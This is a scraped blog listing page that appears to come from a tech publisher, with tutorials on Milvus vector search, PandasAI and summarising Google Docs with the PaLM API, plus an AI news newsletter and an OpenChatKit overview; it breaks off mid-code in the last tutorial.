sentence_embeddings.numpy().tolist()In this section, we're using the transformer model to tokenize the sentences and generate their embeddings. We then normalize these embeddings and convert them to a format suitable for insertion into Milvus (Python lists).With the pooling function defined, we're now equipped to generate the actual sentence embeddings. These embeddings will then be processed and made ready for insertion into Milvus.Inserting vector embeddings into MilvusWe're now ready to interact with Milvus. In this section, we will connect to our locally deployed Milvus server, define a schema for our data, and create a collection in the Milvus database to store our sentence embeddings.Now, it's time to put our Milvus deployment to use. We will define the structure of our data, set up a connection to the Milvus server, and prepare our data for insertion:# Establish a connection to the Milvus server connections.connect("default", host="localhost", port="19530") # Define the schema for our collection fields = [    FieldSchema(name="pk", dtype=DataType.INT64, is_primary=True, auto_id=True),    FieldSchema(name="sentences", dtype=DataType.VARCHAR, is_primary=False, description="The actual sentences",                max_length=256),    FieldSchema(name="embeddings", dtype=DataType.FLOAT_VECTOR, is_primary=False, description="The sentence embeddings",                dim=sentence_embeddings.size()[1]) ] schema = CollectionSchema(fields, "A collection to store sentence embeddings")We establish a connection to the Milvus server and then define the schema for our collection in Milvus. The schema includes a primary key field, a field for the sentences, and a field for the sentence embeddings.With our connection established and schema defined, we can now create our collection, insert our data, and build an index to enable efficient search operations.Create Collection, Insert Data, and Create IndexIn this snippet, we first create the collection in Milvus using the previously defined schema. We then organize our data to match our collection's schema and insert it into our collection. After the data is inserted, we create an index on the embeddings to optimize search operations. Finally, we print the number of entities in the collection to confirm the insertion was successful:# Create the collection in Milvus sentence_embeddings_collection = Collection("sentence_embeddings", schema) # Organize our data to match our collection's schema entities = [    sentences,  # The actual sentences    embeddings,  # The sentence embeddings ] # Insert our data into the collection insert_result = sentence_embeddings_collection.insert(entities) # Create an index to make future search queries faster index = {    "index_type": "IVF_FLAT",    "metric_type": "L2",    "params": {"nlist": 128}, } sentence_embeddings_collection.create_index("embeddings", index) print(f"Number of entities in Milvus: {sentence_embeddings_collection.num_entities}")We create a collection in Milvus using the previously defined schema. We organize our data ( sentences, and sentence embeddings) and insert this data into the collection. Primary keys are generated as auto IDs so we don't need to add them. Finally, we print the number of entities in the collection:This way, the sentences, and their corresponding embeddings are stored in a Milvus collection, ready to be used for similarity searches or other tasks.Now that we've stored our embeddings in Milvus, let's make use of them. We will search for similar vectors in our collection based on similarity to sample vectors.Search Based on Vector SimilarityIn the code, we're loading the data from our collection into memory and then defining the vectors that we want to find similar vectors for:# Load the data into memory sentence_embeddings_collection.load()This step is necessary to load the data in our collection into memory before conducting a search or a query. The search parameters are set, specifying the metric to use for calculating similarity (L2 distance in this case) and the number of clusters to examine during the search operation. The search operation is then performed, and the results are printed out:# Vectors to search vectors_to_search = embeddings[-2:] search_params = {    "metric_type": "L2",    "params": {"nprobe": 10}, } # Perform the search result = sentence_embeddings_collection.search(vectors_to_search, "embeddings", search_params, limit=3, output_fields=["sentences"]) # Print the search results for hits in result:    for hit in hits:        print(f"hit: {hit}, sentence field: {hit.entity.get('sentences')}")Here, we're searching for the two most similar sentence embeddings to the last two embeddings in our list. The results are limited to the top 3 matches, and the corresponding sentences of these matches are printed out:Once we're done with our data, it's a good practice to clean up. In this section, we'll explore how to delete entities from our collection using their primary keys.Delete Entities by Primary KeyThis code first gets the primary keys of the entities that we want to delete. We then query the collection before the deletion operation to show the entities that will be deleted. The deletion operation is performed, and the same query is run after the deletion operation to confirm that the entities have been deleted:# Get the primary keys of the entities we want to delete ids = insert_result.primary_keys expr = f'pk in [{ids[0]}, {ids[1]}]' # Query before deletion result = sentence_embeddings_collection.query(expr=expr, output_fields=["sentences", "embeddings"]) print(f"Query before delete by expr=`{expr}` -> result: \\\\n-{result[0]}\\\\n-{result[1]}\\\\n") # Delete entities sentence_embeddings_collection.delete(expr) # Query after deletion result = sentence_embeddings_collection.query(expr=expr, output_fields=["sentences", "embeddings"]) print(f"Query after delete by expr=`{expr}` -> result: {result}\\\\n")Here, we're deleting the entities corresponding to the first two primary keys in our collection. Before and after the deletion, we perform a query to see the result of the deletion operation:Finally, we drop the entire collection from the Milvus server:# Drop the collection utility.drop_collection("sentence_embeddings")This code first gets the primary keys of the entities that we want to delete. We then query the collection before the deletion operation to show the entities that will be deleted. The deletion operation is performed, and the same query is run after the deletion operation to confirm that the entities have been deleted.ConclusionCongratulations on completing this hands-on tutorial with Milvus! You've learned how to harness the power of an open-source vector database that simplifies and accelerates AI and ML applications. Throughout this journey, you set up Milvus locally using Docker Compose, transformed sentences into high-dimensional embeddings and conducted vector similarity searches for practical use cases.Milvus' advanced indexing techniques have empowered you to efficiently store, search, and analyze large volumes of vector data. Its user-friendly design and seamless integration capabilities ensure that you can leverage its powerful features without unnecessary complexity.As you continue exploring Milvus, you'll uncover even more possibilities for its application in diverse fields, such as recommendation systems, image recognition, and natural language processing. The high-performance similarity search and analytics offered by Milvus open doors to cutting-edge AI-driven solutions.With your newfound expertise in Milvus, you are equipped to embark on your own AI adventures, leveraging the potential of vector databases to tackle real-world challenges. Continue experimenting, innovating, and building AI-driven applications that push the boundaries of what's possible. Happy coding!Author Bio:Alan Bernardo Palacio is a data scientist and an engineer with vast experience in different engineering fields. His focus has been the development and application of state-of-the-art data products and algorithms in several industries. He has worked for companies such as Ernst and Young, Globant, and now holds a data engineer position at Ebiquity Media helping the company to create a scalable data pipeline. Alan graduated with a Mechanical Engineering degree from the National University of Tucuman in 2015, participated as the founder in startups, and later on earned a Master's degree from the faculty of Mathematics in the Autonomous University of Barcelona in 2017. Originally from Argentina, he now works and resides in the Netherlands.LinkedIn 
Read more
  • 0
  • 0
  • 8770

article-image-revolutionizing-data-analysis-with-pandasai
Rohan Chikorde
18 Sep 2023
7 min read
Save for later

Revolutionizing Data Analysis with PandasAI

Rohan Chikorde
18 Sep 2023
7 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!IntroductionData analysis plays a crucial role in extracting meaningful insights from raw data, driving informed decision-making in various fields. Python's Pandas library has long been a go-to tool for data manipulation and analysis. Now, imagine enhancing Pandas with the power of Generative AI, enabling data analysis to become conversational and intuitive. Enter PandasAI, a Python library that seamlessly integrates Generative AI capabilities into Pandas, revolutionizing the way we interact with data.PandasAI is designed to bridge the gap between traditional data analysis workflows and the realm of artificial intelligence. By combining the strengths of Pandas and Generative AI, PandasAI empowers users to engage in natural language conversations with their data. This innovative library brings a new level of interactivity and flexibility to the data analysis process.With PandasAI, you can effortlessly pose questions to your dataset using human-like language, transforming complex queries into simple conversational statements. The library leverages machine learning models to interpret and understand these queries, intelligently extracting the desired insights from the data. This conversational approach eliminates the need for complex syntax and allows users, regardless of their technical background, to interact with data in a more intuitive and user-friendly way.Under the hood, PandasAI combines the power of natural language processing (NLP) and machine learning techniques. By leveraging pre-trained models, it infers user intent, identifies relevant data patterns, and generates insightful responses. Furthermore, PandasAI supports a wide range of data analysis operations, including data cleaning, aggregation, visualization, and more. It seamlessly integrates with existing Pandas workflows, making it a versatile and valuable addition to any data scientist or analyst's toolkit.In this comprehensive blog post, we will first cover how to install and configure PandasAI, followed by detailed usage examples to demonstrate its capabilities.Installing and Configuring PandasAIPandasAI can be easily installed using pip, Python's package manager:pip install pandasaiThis will download and install the latest version of the PandasAI package along with any required dependencies.Next, you need to configure credentials for the AI engine that will power PandasAI's NLP capabilities:from pandasai.llm.openai import OpenAI openai_api_key = "sk-..." llm = OpenAI(api_token=openai_api_key) ai = PandasAI(llm)PandasAI offers detailed documentation on how to get API keys for services like OpenAI and Anthropic.Once configured, PandasAI is ready to supercharge your data tasks through the power of language. Let's now see it in action through some examples.Intuitive Data Exploration Using Natural LanguageA key strength of PandasAI is enabling intuitive data exploration using plain English. Consider this sample data:data = pd.DataFrame({    'Product': ['A', 'B', 'C'],    'Sales': [100, 200, 50],    'Region': ['East', 'West', 'West']}) ai.init(data)You can now ask questions about this data conversationally:ai.run("Which region had the highest sales?") ai.run("Plot sales by product as a bar chart ordered by sales")PandasAI will automatically generate relevant summaries, plots, and insights from the data based on the natural language prompts.Automating Complex Multi-Step Data PipelinesPandasAI also excels at automating relatively complex multi-step analytical data workflows: ai.run("""    Load sales and inventory data    Join tables on product_id    Impute missing values    Remove outliers    Calculate inventory turnover ratio    Segment products into ABC categories """)This eliminates tedious manual coding effort with Pandas.Unified Analysis across Multiple DatasetsFor real-world analysis, PandasAI can work seamlessly across multiple datasets:sales = pd.read_csv("sales.csv") product = pd.read_csv("product.csv") customer = pd.read_csv("customer.csv") ai.add_frames(sales, product, customer) ai.run("Join the datasets. Show average order size by customer city.")This enables deriving unified insights across disconnected data sources.Building Data-Driven Analytics ApplicationsBeyond exploration, PandasAI can power analytics apps via Python integration. For instance:region = input("Enter region: ") ai.run(f"Compare {region} sales to national average") This allows creating customizable analytics tools for business users tailored to their needs. PandasAI can also enable production apps using Streamlit for the UI: import streamlit as st from pandasai import PandasAI region = st.text_input("Enter region:") … … … if region:    insight = ai.run(f"Analyze {region} sales")    st.write(insight)Democratizing Data-Driven DecisionsA key promise of PandasAI is democratizing data analysis by removing coding complexity. This allows non-technical users to independently extract insights through natural language.Data-driven decisions can become decentralized rather than relying on centralized analytics teams. Domain experts can get tailored insights on demand without coding expertise.Real-World ApplicationsLet's explore some real-world applications of PandasAI to understand how it can benefit various industries:FinanceFinancial analysts can use PandasAI to quickly analyze stock market data, generate investment insights, and create financial reports. They can ask questions like, "What are the top-performing stocks in the last quarter?" and receive instant answers. For Example:import pandas as pd from pandasai import PandasAI stocks = pd.read_csv("stocks.csv") ai = PandasAI(model="codex") ai.init(stocks) ai.run("What were the top 5 performing stocks last quarter?") ai.run("Compare revenue growth across technology and healthcare stocks") ai.run("Which sectors saw the most upside surprises in earnings last quarter?")HealthcareHealthcare professionals can leverage PandasAI to analyze patient data, track disease trends, and make informed decisions about patient care. They can ask questions like, "What are the common risk factors for a particular disease?" and gain valuable insights.MarketingMarketers can use PandasAI to analyze customer data, segment audiences, and optimize marketing strategies. They can ask questions like, "Which marketing channels have the highest conversion rates?" and fine-tune their campaigns accordingly.E-commerceE-commerce businesses can benefit from PandasAI by analyzing sales data, predicting customer behavior, and optimizing inventory management. They can ask questions like, "What products are likely to be popular next month?" and plan their stock accordingly.ConclusionPandasAI represents an exciting glimpse into the future of data analysis driven by AI advancement. By automating the tedious parts of data preparation and manipulation, PandasAI allows data professionals to focus on high-value tasks - framing the right questions, interpreting insights, and telling impactful data stories.Its natural language interface also promises to open up data exploration and analysis to non-technical domain experts. Rather than writing code, anyone can derive tailored insights from data by simply asking questions in plain English.As AI continues progressing, we can expect PandasAI to become even more powerful and nuanced in its analytical abilities over time. It paves the path for taking data science from simple pattern recognition to deeper knowledge generation using machines that learn, reason and connect concepts.While early in its development, PandasAI offers a taste of what is possible when the foundations of data analysis are reimagined using AI. It will be fascinating to see how this library helps shape and transform the analytics landscape in the coming years. For forward-thinking data professionals, the time to embrace its possibilities is now.In summary, by synergizing the strengths of Pandas and large language models, PandasAI promises to push the boundaries of what is possible in data analysis today. It represents an important milestone in the AI-driven evolution of the field.Author BioRohan Chikorde is an accomplished AI Architect professional with a post-graduate in Machine Learning and Artificial Intelligence. With almost a decade of experience, he has successfully developed deep learning and machine learning models for various business applications. Rohan's expertise spans multiple domains, and he excels in programming languages such as R and Python, as well as analytics techniques like regression analysis and data mining. In addition to his technical prowess, he is an effective communicator, mentor, and team leader. Rohan's passion lies in machine learning, deep learning, and computer vision.LinkedIn
Read more
  • 0
  • 0
  • 8757

article-image-ai-distilled-18-oracles-clinical-digital-assistant-google-deepminds-alphamissense-ai-powered-stable-audio-prompt-lifecycle-3d-gaussian-splatting
Merlyn Shelley
21 Sep 2023
12 min read
Save for later

AI_Distilled #18: Oracle’s Clinical Digital Assistant, Google DeepMind's AlphaMissense, AI-Powered Stable Audio, Prompt Lifecycle, 3D Gaussian Splatting

Merlyn Shelley
21 Sep 2023
12 min read
👋 Hello,“A computer would deserve to be called intelligent if it could deceive a human into believing that it was human.” - Alan Turing, Visionary Computer Scientist.This week, we begin by spotlighting Turing's test, a crucial concept in computer science. It sparks discussions about how AI emulates human intelligence, ultimately elevating productivity and creativity. A recent Hardvard study revealed how AI improves worker productivity and reduces task completion time by 25% while also improving quality by 40%. A study with 758 Boston Consulting Group consultants revealed that GPT-4 boosted productivity by 12.2% on tasks it could handle. Welcome to AI_Distilled #18, your ultimate source for everything related to AI, GPT, and LLMs.  In this edition, we’ll talk about OpenAI expanding to EU with Dublin office and key hires, AI-Powered Stable Audio transforming text into high-quality music, a Bain study predicting how generative AI will dominate game development in 5-10 years, and Oracle introducing AI-powered clinical digital assistant for healthcare. A fresh batch of AI secret knowledge and tutorials is here too! Look out for a comprehensive guide to prompt lifecycle, exploring LLM selection and evaluation, a primer on 3D gaussian splatting: rasterization and its future in graphics, and a step-by-step guide to text generation with GPT using Hugging Face transformers library in Python.In addition, we're showcasing an article by our author Ben Auffarth about Langchain, offering a sneak peek into our upcoming virtual conference. Writer’s Credit: Special shout-out to Vidhu Jain for their valuable contribution to this week’s newsletter content!  Cheers,  Merlyn Shelley  Editor-in-Chief, Packt  ⚡ TechWave: AI/GPT News & Analysis OpenAI Expands to EU with Dublin Office and Key Hires: The ChatGPT creator is opening its first European Union office in Dublin, signaling its readiness for upcoming AI regulatory challenges. This move follows OpenAI's announcement of its third office, with locations in San Francisco and London. The expansion into Ireland is strategically significant, as many tech companies choose it as a hub to engage with European regulators and clients while benefiting from favorable tax rates. OpenAI is actively hiring for positions in Dublin, including an associate general counsel, policy and partnerships lead, privacy program manager, software engineer focused on privacy, and a media relations lead. This expansion highlights OpenAI's commitment to addressing privacy concerns, especially in the EU, where ChatGPT faced scrutiny and regulatory actions related to data protection. AI-Powered Stable Audio Transforms Text into High-Quality Music: Stability AI has unveiled Stable Audio, an AI model capable of converting text descriptions into stereo 44.1 kHz music and sound effects. This breakthrough technology raises the potential of AI-generated audio rivaling human-made compositions. Stability AI collaborated with AudioSparx, incorporating over 800,000 audio files and text metadata into the model, enabling it to mimic specific sounds based on text commands. Stable Audio operates efficiently, rendering 95 seconds of 16-bit stereo audio at 44.1 kHz in under a second using Nvidia A100 GPUs. It comes with free and Pro plans, offering users the ability to generate music with varying lengths and quantities, marking a significant advancement in AI-generated audio quality. Oracle Introduces AI-Powered Clinical Digital Assistant for Healthcare: Oracle has unveiled its AI-powered Clinical Digital Assistant to enhance electronic health record (EHR) solutions in healthcare. This innovation aims to automate administrative tasks for caregivers, allowing them to focus on patient care. It addresses concerns related to the adoption of generative AI technologies in healthcare. The assistant offers multimodal support, responding to both text and voice commands, streamlining tasks such as accessing patient data and prescriptions. It remains active during appointments, providing relevant information and suggesting actions. Patients can also interact with it for appointment scheduling and medical queries. Oracle plans a full rollout of capabilities over the next year.  Generative AI to Dominate Game Development in 5-10 Years, Says Bain Study: A study by global consulting firm Bain & Company predicts that generative AI will account for more than 50% of game development in the next 5 to 10 years, up from less than 5% currently. The research surveyed 25 gaming executives worldwide, revealing that most believe generative AI will enhance game quality and expedite development, but only 20% think it will reduce costs. Additionally, 60% don't expect generative AI to significantly alleviate the talent shortage in the gaming industry, emphasizing the importance of human creativity. The study highlights that generative AI should complement human creativity rather than replace it.  Google DeepMind's AI Program, AlphaMissense, Predicts Harmful DNA Mutations: Researchers at Google DeepMind have developed AlphaMissense, an artificial intelligence program that can predict whether genetic mutations are harmless or likely to cause diseases, with a focus on missense mutations, where a single letter is misspelled in the DNA code. AlphaMissense assessed 71 million single-letter mutations affecting human proteins, determining 57% were likely harmless, 32% likely harmful, and uncertain about the rest. The program's predictions have been made available to geneticists and clinicians to aid research and diagnosis. AlphaMissense performs better than current programs, potentially helping identify disease-causing mutations and guiding treatment.  📥 Feedback on the Weekly EditionWhat do you think of this issue and our newsletter?Please consider taking the short survey below to share your thoughts and you will get a free PDF of the “The Applied Artificial Intelligence Workshop” eBook upon completion. Complete the Survey. Get a Packt eBook for Free! 🔮 Looking for a New Book from Packt’s Expert Community? Splunk 9.x Enterprise Certified Admin Guide - By Srikanth Yarlagadda If Splunk is a part of your professional toolkit, consider exploring the Splunk 9.x Enterprise Certified Admin Guide. In an era where the IT sector's demand for Splunk expertise is consistently increasing, this resource proves invaluable. It comprehensively addresses essential aspects of Splunk Enterprise, encompassing installation, license management, user and forwarder administration, index creation, configuration file setup, data input handling, field extraction, and beyond. Moreover, the inclusion of self-assessment questions facilitates a thorough understanding, rendering it an indispensable guide for Splunk Enterprise administrators aiming to excel in their field. Interested in getting a sneak peek of Chapter 1 without any commitment? Simply click the button below to access it. Read through the Chapter 1 unlocked here...  🌟 Secret Knowledge: AI/LLM Resources Understanding the Prompt Lifecycle: A Comprehensive Guide: A step-by-step guide to the prompt lifecycle, which is crucial for effective prompt engineering in AI applications. The guide covers four main stages: Design & Experiment, Differentiate & Personalize, Serve & Operate, and Analyze Feedback & Adapt. In each stage, you'll learn how to design, differentiate, serve, and adapt prompts effectively, along with the specific tools required. Additionally, the post addresses the current state of tooling solutions for prompt lifecycle management and highlights the existing gaps in prompt engineering tooling.  Exploring LLM Selection and Evaluation: A Comprehensive Guide: In this post, you'll discover a comprehensive guide to selecting and evaluating LLMs. The guide delves into the intricate process of choosing the right LLM for your specific task and provides valuable insights into evaluating their performance effectively. By reading this post, you can expect to gain a thorough understanding of the criteria for LLM selection, the importance of evaluation metrics, and practical tips to make informed decisions when working with these powerful language models. A Primer on 3D Gaussian Splatting: Rasterization and Its Future in Graphics: In this post, you'll delve into the world of 3D Gaussian Splatting, a rasterization technique with promising implications for graphics. You'll explore the core concept of 3D Gaussian Splatting, which involves representing scenes using gaussians instead of triangles. The post guides you through the entire process, from Structure from Motion (SfM) to converting points to gaussians and training the model for optimal results. It also touches on the importance of differentiable Gaussian rasterization.  How to Build a Multi-GPU System for Deep Learning in 2023: A Step-by-Step Guide: Learn how to construct a multi-GPU system tailored for deep learning while staying within budget constraints. The guide begins by delving into crucial GPU considerations, emphasizing the importance of VRAM, performance (evaluated via FLOPS and tensor cores), slot width, and power consumption. It offers practical advice on choosing the right GPU for your budget. The post then moves on to selecting a compatible motherboard and CPU, paying special attention to PCIe lanes and slot spacing. The guide also covers RAM, disk space, power supply, and PC case considerations, offering insights into building an efficient multi-GPU system.  ✨ Expert Insights from Packt Community  This week’s featured article is written by Ben Auffarth, the Head of Data Science at loveholidays. LangChain provides an intuitive framework that makes it easier for AI developers, data scientists, and even those new to NLP technology to create applications using LLMs. What can I build with LangChain? LangChain empowers various NLP use cases such as virtual assistants, content generation models for summaries or translations, question answering systems, and more. It has been used to solve a variety of real-world problems.  For example, LangChain has been used to build chatbots, question answering systems, and data analysis tools. It has also been used in a number of different domains, including healthcare, finance, and education. You can build a wide variety of applications with LangChain, including: Chatbots: It can be used to build chatbots that can interact with users in a natural way. Question answering: LangChain can be used to build question answering systems that can answer questions about a variety of topics. Data analysis: You can use it for automated data analysis and visualization to extract insights. Code generation: You can set up software pair programming assistants that can help to solve business problems. And much more! This is an excerpt from the Author’s upcoming book Generative AI with LangChain with Packt. If you're intrigued by this, we invite you to join us at our upcoming virtual conference for an in-depth exploration of LangChain and gain a better understanding of how to responsibly apply Large Language Models (LLMs) and move beyond merely producing statistically driven responses. The author will then take you on the practical journey of crafting your own chatbot, akin to the capabilities of ChatGPT. Missed the Early Bird Special offer for the big event? No worries! You can still save 40% by booking your seat now. Reserve your seat at 40%OFF 💡 Masterclass: AI/LLM TutorialsLearn How to Orchestrate Ray-Based ML Workflows with Amazon SageMaker Pipelines: Discover the benefits of combining Ray and Amazon SageMaker for distributed ML in this comprehensive guide. Understand how Ray, an open-source distributed computing framework, simplifies distributed ML tasks, and how SageMaker seamlessly integrates with it. This post provides a step-by-step tutorial on building and deploying a scalable ML workflow using these tools, covering data ingestion, data preprocessing with Ray Dataset, model training, hyperparameter tuning with XGBoost-Ray, and more. You'll also explore how to orchestrate these steps using SageMaker Pipelines, enabling efficient and automated ML workflows. Dive into the detailed code snippets and unleash the potential of your ML projects. Building and Deploying Tool-Using LLM Agents with AWS SageMaker JumpStart Foundation Models: Discover how to create and deploy LLM agents with extended capabilities, including access to external tools and self-directed task execution. This post introduces LLM agents and guides you through building and deploying an e-commerce LLM agent using Amazon SageMaker JumpStart and AWS Lambda. This agent leverages tools to enhance its functionality, such as answering queries about returns and order updates. The architecture involves a Flan-UL2 model deployed as a SageMaker endpoint, data retrieval tools with AWS Lambda, and integration with Amazon Lex for use as a chatbot.  Step-by-Step Guide to Text Generation with GPT using Hugging Face Transformers Library in Python: In this post, you'll learn how to utilize the Hugging Face Transformers library for text generation and natural language processing without the need for OpenAI API keys. The Hugging Face Transformers library offers a range of models, including GPT-2, GPT-3, GPT-4, T5, BERT, and more, each with unique characteristics and use cases. You'll explore how to install the required libraries, choose a pretrained language model, and generate text based on a prompt or context using Python and the Flask framework. This comprehensive guide will enable you to implement text generation applications with ease, making AI-powered interactions accessible to users.  💬 AI_Distilled User Insights Space Would you like to participate in our user feedback interview to shape AI_Distilled's content and address your professional challenges?Share your content requirements and ideas in 15 simple questions. Plus, be among the first 25 respondents to receive a free Packt credit for claiming a book of your choice from our vast digital library. Don't miss this chance to improve the newsletter and expand your knowledge. Join us today! Share Your Insights Now! 🚀 HackHub: Trending AI Toolsise-uiuc/Repilot: Patch generation tool designed for Java and based on large language models and code completion engines. turboderp/exllamav2: Early release of an inference library for local LLMs on consumer GPUs, requiring further testing and development.  liuyuan-pal/SyncDreamer: Focuses on creating multiview-consistent images from single-view images. FL33TW00D/whisper-turbo: Fast, cross-platform Whisper implementation running in your browser or electron app offering real-time streaming and privacy. OpenBMB/ChatDev: Virtual software company run by intelligent agents with various roles aiming to revolutionize programming and study collective intelligence. 
Read more
  • 0
  • 0
  • 8136
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-openchatkit-could-be-your-open-source-alternative-to-chatgpt
Julian Melanson
20 Jun 2023
5 min read
Save for later

OpenChatKit Could be Your Open-Source Alternative to ChatGPT

Julian Melanson
20 Jun 2023
5 min read
It’s no surprise that LLMs like ChatGPT and Bard possess impressive capabilities. However, it’s important to note that they are proprietary software, subject to restrictions in terms of access and usage due to licensing constraints. Consequently, this limitation has generated significant interest within the open-source community, leading to the development of alternative solutions that emphasize freedom, transparency, and community-driven collaboration.In recent months, the open-source community Together has introduced OpenChatKit, an alternative to ChatGPT, aimed at providing developers with a versatile chatbot solution. OpenChatKit utilizes the GPT-NeoX language model developed by EleutherAI, which consists of an impressive 20 billion parameters. Additionally, the model has been fine-tuned specifically for chat use with 43 million instructions. OpenChatKit's performance surpasses the base model in the industry-standard HELM benchmark, making it a promising tool for various applications.OpenChatKit Components and CapabilitiesOpenChatKit is accompanied by a comprehensive toolkit available on GitHub under the Apache 2.0 license. The toolkit includes several key components designed to enhance customization and performance:Customization recipes: These recipes allow developers to fine-tune the language model for their specific tasks, resulting in higher accuracy and improved performance.Extensible retrieval system: OpenChatKit enables developers to augment bot responses by integrating information from external sources such as document repositories, APIs, or live-updating data during inference time. This capability enhances the bot's ability to provide contextually relevant and accurate responses.Moderation model: The toolkit incorporates a moderation model derived from GPT-JT-6B, fine-tuned to filter and determine which questions the bot should respond to. This feature helps ensure appropriate and safe interactions.Feedback mechanisms: OpenChatKit provides built-in tools for users to provide feedback on the chatbot's responses and contribute new datasets. This iterative feedback loop allows for continuous improvement and refinement of the chatbot's performance.OpenChatKit's Strengths and LimitationsDevelopers highlight OpenChatKit's strengths in specific tasks such as summarization, contextual question answering, information extraction, and text classification. It excels in these areas, offering accurate and relevant responses.However, OpenChatKit's performance is comparatively weaker in tasks that require handling questions without context, coding, and creative writing—areas where ChatGPT has gained popularity. OpenChatKit may occasionally generate erroneous or misleading responses (hallucinations), a challenge that is also encountered in ChatGPT. Furthermore, OpenChatKit sometimes struggles with smoothly transitioning between conversation topics and may occasionally repeat answers.Fine-Tuning and Specialized Use CasesOpenChatKit's performance can be significantly improved by fine-tuning it for specific use cases. Together, the developers are actively working on their own chatbots designed for learning, financial advice, and support requests. By tailoring OpenChatKit to these specific domains, they aim to enhance its capabilities and deliver more accurate and contextually appropriate responses.Comparing OpenChatKit with ChatGPTIn a brief evaluation, OpenChatKit did not demonstrate the same level of eloquence as ChatGPT. This discrepancy can partly be attributed to OpenChatKit's response limit of 256 tokens, which is less than the approximately 500 tokens in ChatGPT. As a result, OpenChatKit generates shorter responses. However, OpenChatKit outperforms ChatGPT in terms of response speed, generating replies at a faster rate. The language transition between different languages does not appear to pose any challenges for OpenChatKit, and it supports formatting options like lists and tables.The Role of User Feedback in ImprovementTogether recognizes the importance of user feedback in enhancing OpenChatKit's performance and plan to leverage it for further improvement. Actively involving users in providing feedback and suggestions ensures that OpenChatKit evolves to meet user expectations and becomes increasingly useful across a wide range of applications.The Future of Decentralized Training for AI ModelsThe decentralized training approach employed in OpenChatKit, as previously seen with GPT-JT, represents a potential future for large-scale open-source projects. By distributing the computational load required for training across numerous machines instead of relying solely on a central data center, developers can leverage the combined power of multiple systems. This decentralized approach not only accelerates training but also promotes collaboration and accessibility within the open-source community.Anticipating Future DevelopmentsOpenChatKit is the pioneer among open-source alternatives to ChatGPT. However, it is likely that other similar projects will emerge. Notably, Meta's LLaMa models, which were leaked, boast parameters three times greater than GPT-NeoX-20B. With these advancements, it is only a matter of time before chatbots based on these models enter the scene.Getting Started with OpenChatKitGetting started with the program is simple:Head to https://openchatkit.net/#demo in your browserRead through the guidelines and agree to the Terms & ConditionsType your prompt into the chatboxNow you can test-drive the program and see how you like it compared to other LLMS. SummaryIn summation, OpenChatKit presents an exciting alternative to ChatGPT. Leveraging the powerful GPT-NeoX language model and extensive fine-tuning for chat-based interactions, OpenChatKit demonstrates promising capabilities in tasks such as summarization, contextual question answering, information extraction, and text classification. While some limitations exist, such as occasional hallucinations and difficulty transitioning between topics, fine-tuning OpenChatKit for specific use cases significantly improves its performance. With the provided toolkit, developers can customize the chatbot to suit their needs, and user feedback plays a crucial role in the continuous refinement of OpenChatKit. As decentralized training becomes an increasingly prominent approach in open-source projects, OpenChatKit sets the stage for further innovations in the field, while also foreshadowing the emergence of more advanced chatbot models in the future.Author BioJulian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning! 
Read more
  • 0
  • 0
  • 8073

article-image-generate-google-doc-summaries-using-palm-api-and-google-apps-script
Aryan Irani
13 Sep 2023
8 min read
Save for later

Generate Google Doc summaries using PaLM API and Google Apps Script

Aryan Irani
13 Sep 2023
8 min read
IntroductionIn this article, we'll delve into the powerful synergy of the PaLM API and Google Apps Script, unveiling a seamless way to generate concise summaries for your Google Docs. Say goodbye to manual summarization and embrace efficiency as we guide you through the process of simplifying your document management tasks. Let's embark on this journey to streamline your Google Doc summaries and enhance your productivity.Sample Google DocFor this blog, we will be using a very simple Google Doc that contains a paragraph for which we want to generate a summary for. If you want to work with the Google Docs, click here. Once you make a copy of the Google Doc you have to go ahead and change the API key in the Google Apps Script code. Step1: Get the API keyCurrently, PaLM API hasn’t been released for public use but to access it before everybody does, you can apply for the waitlist by clicking here. If you want to know more about the process of applying for MakerSuite and PaLM API, you can check the YouTube tutorial here.Once you have access, to get the API key, we have to go to MakerSuite and go to the Get API key section. To get the API key, follow these steps:1. Go to MakerSuite or click here.2. On opening the MakerSuite you will see something like this3. To get the API key go ahead and click on Get API key on the left side of the page.4. On clicking Get API key, you will see something like this where you can create your API key.5. To create the API key go ahead and click on Create API key in new project.On clicking Create API Key, in a few seconds, you will be able to copy the API key.Step 2: Write the Automation ScriptWhile you are in the Google Docs, let’s open up the Script Editor to write some Google Apps Script. To open the Script Editor, follow these steps:1. Click on Extensions and open the Script Editor.2. This brings up the Script Editor as shown below.We have reached the script editor lets code.Now that we have the Google Doc setup and the API key ready, let’s go ahead and write our Google Apps Script code to get the summary for the paragraph in the Google Doc. function onOpen(){ var ui = DocumentApp.getUi(); ui.createMenu('Custom Menu')     .addItem('Summarize Selected Paragraph', 'summarizeSelectedParagraph')     .addToUi();   }We are going to start out by creating our own custom menu using which we can select the paragraph we want to summarize and run the code. To do that we are going to start out by opening a new function called onOpen(). On opening the function we are going to create a menu using the create.Menu() function, inside which we will be passing the name of the menu. After that, we assign some text to the name followed by the function you want to run when the menu is clicked. function DocSummary(paragraph){ var apiKey = "your_api_key"; var apiUrl = "https://generativelanguage.googleapis.com/v1beta2/models/text-bison-001:generateText";We start out by opening a new function BARD() inside which we will declare the API key that we just copied. After declaring the API key we go ahead and declare the API endpoint that is provided in the PaLM API documentation. You can check out the documentation by checking out the link given below.We are going to be receiving the prompt from the Google Doc from the BARD function that we just created.Generative Language API | PaLM API | Generative AI for DevelopersThe PaLM API allows developers to build generative AI applications using the PaLM model. Large Language Models (LLMs)…developers.generativeai.googl var url = apiUrl + "?key=" + apiKey var headers = {   "Content-Type": "application/json" } var prompt = {   'text': "Please generate a short summary for :\n" + paragraph } var requestBody = {   "prompt": prompt }Here we create a new variable called url inside which we combine the API URL and the API key, resulting in a complete URL that includes the API key as a parameter. The headers specify the type of data that will be sent in the request which in this case is “application/json”.Now we come to the most important part of the code which is declaring the prompt. For this blog, we will be asking Bard to summarize a paragraph followed by the paragraph present in the Google Doc. All of this will be stored in the prompt variable. Now that we have the prompt ready, we create an object that will contain this prompt that will be sent in the request to the API. var options = {   "method": "POST",   "headers": headers,   "payload": 